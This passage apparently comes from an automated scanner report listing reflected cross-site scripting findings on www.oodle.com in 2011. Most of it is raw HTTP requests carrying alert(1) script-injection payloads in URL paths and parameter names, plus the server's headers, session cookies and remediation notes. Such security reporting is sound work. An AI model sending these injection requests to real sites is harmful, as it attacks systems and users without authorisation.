GET /info/about/?e1397"><script>alert(1)</script>056c3249a70=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:50 GMT Content-Length: 21028 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE0OTt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d1a"><script>alert(1)</script>2d2985c0418 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /infoc2d1a"><script>alert(1)</script>2d2985c0418/help/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:36 GMT Content-Length: 23785 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE5NTt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47821"-alert(1)-"e82cc343362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info47821"-alert(1)-"e82cc343362/help/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:37 GMT Content-Length: 23736 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE5Nzt9; path=/; domain=.oodle.com
1.18. http://www.oodle.com/info/help/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/help/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ca2"><script>alert(1)</script>5704eafb4a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/help/?45ca2"><script>alert(1)</script>5704eafb4a8=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:20 GMT Content-Length: 23616 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE3OTt9; path=/; domain=.oodle.com
1.19. http://www.oodle.com/info/help/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/help/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd142"-alert(1)-"4c39ba35392 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/help/?fd142"-alert(1)-"4c39ba35392=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:21 GMT Content-Length: 23551 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE4MTt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77362"-alert(1)-"05c1d7cbab3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info77362"-alert(1)-"05c1d7cbab3/partner/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:43 GMT Content-Length: 23739 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIwMzt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35817"><script>alert(1)</script>8f9bf4500db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info35817"><script>alert(1)</script>8f9bf4500db/partner/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:42 GMT Content-Length: 23800 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIwMjt9; path=/; domain=.oodle.com
1.22. http://www.oodle.com/info/partner/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/partner/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 576b6"><script>alert(1)</script>5226ebe6695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/partner/?576b6"><script>alert(1)</script>5226ebe6695=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:29 GMT Content-Length: 22134 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE4OTt9; path=/; domain=.oodle.com
1.23. http://www.oodle.com/info/partner/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/partner/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84f72"-alert(1)-"63fb27e861f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/partner/?84f72"-alert(1)-"63fb27e861f=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:30 GMT Content-Length: 22083 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE5MDt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e89"><script>alert(1)</script>0303e12ef97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info52e89"><script>alert(1)</script>0303e12ef97/privacy/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:47 GMT Content-Length: 23800 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIwNzt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16054"-alert(1)-"14e6beb1dd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info16054"-alert(1)-"14e6beb1dd9/privacy/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:49 GMT Content-Length: 23757 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDIwOTt9; path=/; domain=.oodle.com
1.26. http://www.oodle.com/info/privacy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/privacy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea93"><script>alert(1)</script>ecb5162f98b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/privacy/?6ea93"><script>alert(1)</script>ecb5162f98b=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:16:36 GMT Content-Length: 27045 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE5NTt9; path=/; domain=.oodle.com
1.27. http://www.oodle.com/info/privacy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/privacy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81bf3"-alert(1)-"455aac7a31c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
